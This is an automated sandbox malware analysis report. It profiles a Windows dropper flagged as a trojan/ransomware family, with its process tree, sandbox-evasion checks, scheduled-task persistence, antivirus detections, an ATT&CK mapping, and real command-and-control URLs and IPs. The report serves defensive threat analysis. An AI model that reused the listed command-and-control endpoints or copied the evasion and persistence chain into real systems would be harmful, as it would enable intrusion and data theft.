            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0088B8E0
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089AAA8 FindFirstFileExA, 0_2_0089AAA8
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088DD72 VirtualQuery,GetSystemInfo, 0_2_0088DD72
            Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user
            Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\AppData\Local
            Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\AppData
            Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\Desktop\desktop.ini
            Source: QIKiV83Pkl.exe, 00000000.00000003.1335317121.00000000034B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000002.00000003.1440152295.00000000035E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1608191159.000000001BCB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
            Source: w32tm.exe, 00000021.00000002.1545110842.0000029B28F79000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: QIKiV83Pkl.exe, 00000000.00000003.1335317121.00000000034B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe API call chain: ExitProcess graph end node graph_0-23701
            Source: C:\brokermonitordhcp\portruntime.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0089866F
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089753D mov eax, dword ptr fs:[00000030h] 0_2_0089753D
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089B710 GetProcessHeap, 0_2_0089B710
            Source: C:\brokermonitordhcp\portruntime.exe Process token adjusted: Debug
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process token adjusted: Debug
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process token adjusted: Debug
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088F063 SetUnhandledExceptionFilter, 0_2_0088F063
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0088F22B
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0089866F
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0088EF05
            Source: C:\brokermonitordhcp\portruntime.exe Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\brokermonitordhcp\portruntime.exe "C:\brokermonitordhcp\portruntime.exe"
            Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exe Process created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088ED5B cpuid 0_2_0088ED5B
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0088A63C
            Source: C:\brokermonitordhcp\portruntime.exe Queries volume information: C:\brokermonitordhcp\portruntime.exe VolumeInformation
            Source: C:\brokermonitordhcp\portruntime.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\brokermonitordhcp\portruntime.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe VolumeInformation
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe VolumeInformation
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe VolumeInformation
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0088D5D4
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087ACF5 GetVersionExW, 0_2_0087ACF5
            Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1608191159.000000001BCB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            Source: Yara match File source: 00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.1564725393.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000002.1515032727.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1476467442.0000000012CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: portruntime.exe PID: 3212, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1964, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1532, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 6572, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: 00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.1564725393.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000002.1515032727.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1476467442.0000000012CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: portruntime.exe PID: 3212, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1964, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1532, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 6572, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic, in matrix row order; a number in front of a technique is the count shown in the matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 241 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scheduled Task/Job; 11 Scripting; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 233 Masquerading; 1 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 261 Security Software Discovery; 1 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 3 File and Directory Discovery; 57 System Information Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1483416, Sample: QIKiV83Pkl.exe, Start date: 27/07/2024, Architecture: WINDOWS, Score: 100

Contacted hosts: pastebin.com; romangw5.beget.tech; bg.microsoft.map.fastly.net
Top-level signatures: Found malware configuration; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Connects to a pastebin service (likely for C&C) (pastebin.com); 10 other signatures

Process tree (node numbers as in the graph):
• 11 QIKiV83Pkl.exe, started
  • dropped: C:\brokermonitordhcp\portruntime.exe (PE32); C:\...\NKrhHlHeQ28n8tUMpitEGWra.vbe (data)
  • 20 wscript.exe, started
    • signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    • 23 cmd.exe, started
      • 25 portruntime.exe, started
        • dropped: C:\...\HuzhgkcqwYiFfxvhdfMUs.exe (PE32); C:\Windows\...\HuzhgkcqwYiFfxvhdfMUs.exe (PE32); C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe (PE32); 5 other malicious files
        • signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 4 other signatures
        • 31 cmd.exe, started
          • 39 HuzhgkcqwYiFfxvhdfMUs.exe, started (signature: Multi AV Scanner detection for dropped file)
          • 42 conhost.exe, started
          • 44 w32tm.exe, started
        • 33 schtasks.exe, started
        • 35 schtasks.exe, started
        • 37: 19 other processes, started
      • 29 conhost.exe, started
• 14 HuzhgkcqwYiFfxvhdfMUs.exe, started
  • signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
• 17 HuzhgkcqwYiFfxvhdfMUs.exe, started
  • network: pastebin.com 172.67.19.24, 443, 49704, CLOUDFLARENETUS, United States; romangw5.beget.tech 5.101.153.57, 49706, 80, BEGET-ASRU, Russian Federation

Antivirus detection, submitted sample (Source | Detection | Scanner | Label)
QIKiV83Pkl.exe | 71% | ReversingLabs | Win32.Trojan.Vigorf
QIKiV83Pkl.exe | 59% | Virustotal | -
QIKiV83Pkl.exe | 100% | Avira | VBS/Runner.VPG
QIKiV83Pkl.exe | 100% | Joe Sandbox ML | -

Antivirus detection, dropped files (Source | Detection | Scanner | Label)
C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat | 100% | Avira | BAT/Delbat.C
C:\brokermonitordhcp\portruntime.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\Default\conhost.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Avira | HEUR/AGEN.1323984
C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe | 100% | Avira | VBS/Runner.VPG
C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe | 100% | Joe Sandbox ML | -
C:\brokermonitordhcp\portruntime.exe | 100% | Joe Sandbox ML | -
C:\Users\Default\conhost.exe | 100% | Joe Sandbox ML | -
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Joe Sandbox ML | -
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Joe Sandbox ML | -
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Joe Sandbox ML | -
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Joe Sandbox ML | -
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 100% | Joe Sandbox ML | -
C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe | 68% | Virustotal | -
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe | 68% | Virustotal | -
C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | 68% | Virustotal | -
C:\Users\Default\conhost.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Default\conhost.exe | 68% | Virustotal | -
C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe | 68% | Virustotal | -
C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe | 68% | Virustotal | -
C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | 68% | Virustotal | -
C:\brokermonitordhcp\portruntime.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\brokermonitordhcp\portruntime.exe | 68% | Virustotal | -
            No Antivirus matches
Antivirus detection, domains (Source | Detection | Scanner | Label)
bg.microsoft.map.fastly.net | 0% | Virustotal | -
romangw5.beget.tech | 1% | Virustotal | -
pastebin.com | 0% | Virustotal | -

Antivirus detection, URLs (Source | Detection | Scanner | Label)
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://romangw5.beget.tech/ | 0% | Avira URL Cloud | safe
http://romangw5.beget.tech | 0% | Avira URL Cloud | safe
https://pastebin.com/raw/i8wetBiv | 0% | Avira URL Cloud | safe
http://pastebin.com | 0% | Avira URL Cloud | safe
http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f | 0% | Avira URL Cloud | safe
http://romangw5.beget.tech/ | 1% | Virustotal | -
http://romangw5.beget.tech | 1% | Virustotal | -
https://pastebin.com | 0% | Avira URL Cloud | safe
http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 | 0% | Avira URL Cloud | safe
http://pastebin.com | 0% | Virustotal | -
https://pastebin.com/raw/i8wetBiv | 2% | Virustotal | -
https://pastebin.com | 0% | Virustotal | -
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | - | unknown
romangw5.beget.tech | 5.101.153.57 | true | false | - | unknown
pastebin.com | 172.67.19.24 | true | true | - | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
https://pastebin.com/raw/i8wetBiv | true | 2% Virustotal; Avira URL Cloud: safe | unknown
http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 | false | Avira URL Cloud: safe | unknown

URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation)
http://romangw5.beget.tech/ | HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp; HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
http://romangw5.beget.tech | HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | portruntime.exe, 00000005.00000002.1474905892.000000000300D000.00000004.00000800.00020000.00000000.sdmp; HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://pastebin.com | HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E5D000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f | HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp; HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pastebin.com | HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E54000.00000004.00000800.00020000.00000000.sdmp; HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmp | true | 0% Virustotal; Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
172.67.19.24 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
5.101.153.57 | romangw5.beget.tech | Russian Federation | 198610 | BEGET-ASRU | false
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1483416
            Start date and time:2024-07-27 11:36:09 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 48s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:42
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:QIKiV83Pkl.exe
            renamed because original name is a hash value
            Original Sample Name:2c00ebc767b339c3baf6bcf3086edf51.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@39/22@2/2
            EGA Information:
            • Successful, ratio: 20%
            HCA Information:
            • Successful, ratio: 59%
            • Number of executed functions: 397
            • Number of non-executed functions: 96
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, winlogon.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 40.68.123.157, 20.242.39.171, 2.19.126.137, 2.19.126.163, 13.85.23.206
            • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
            • Execution Graph export aborted for target HuzhgkcqwYiFfxvhdfMUs.exe, PID 1532 because it is empty
            • Execution Graph export aborted for target HuzhgkcqwYiFfxvhdfMUs.exe, PID 1964 because it is empty
            • Execution Graph export aborted for target HuzhgkcqwYiFfxvhdfMUs.exe, PID 6572 because it is empty
            • Execution Graph export aborted for target portruntime.exe, PID 3212 because it is empty
• Not all processes were analyzed; the report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
Timeline (Time | Type | Description)
05:37:31 | API Interceptor | 12x Sleep call for process: HuzhgkcqwYiFfxvhdfMUs.exe modified
11:37:27 | Task Scheduler | Run new task: conhost path: "C:\Users\Default\conhost.exe"
11:37:27 | Task Scheduler | Run new task: conhostc path: "C:\Users\Default\conhost.exe"
11:37:27 | Task Scheduler | Run new task: HuzhgkcqwYiFfxvhdfMUs path: "C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe"
11:37:27 | Task Scheduler | Run new task: HuzhgkcqwYiFfxvhdfMUsH path: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
11:37:30 | Task Scheduler | Run new task: winlogon path: "C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe"
11:37:30 | Task Scheduler | Run new task: winlogonw path: "C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe"
IP context (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
172.67.19.24 | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
172.67.19.24 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Dadebehring PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
5.101.153.57 | yx18iwwPFF.exe | malicious | DCRat | -

Domain context (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
pastebin.com | LisectAVT_2403002B_361.exe | malicious | Quasar | 172.67.19.24
pastebin.com | Lisect_AVT_24003_G1A_84.exe | malicious | Bdaejec | 104.20.4.235
pastebin.com | wdOEfoZ2zn.exe | malicious | DCRat | 104.20.3.235
pastebin.com | 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | malicious | Bdaejec, PrivateLoader | 104.20.4.235
pastebin.com | 25C1.exe | malicious | Glupteba, Xmrig | 104.20.3.235
pastebin.com | 88YW43jlqt.exe | malicious | DCRat | 172.67.19.24
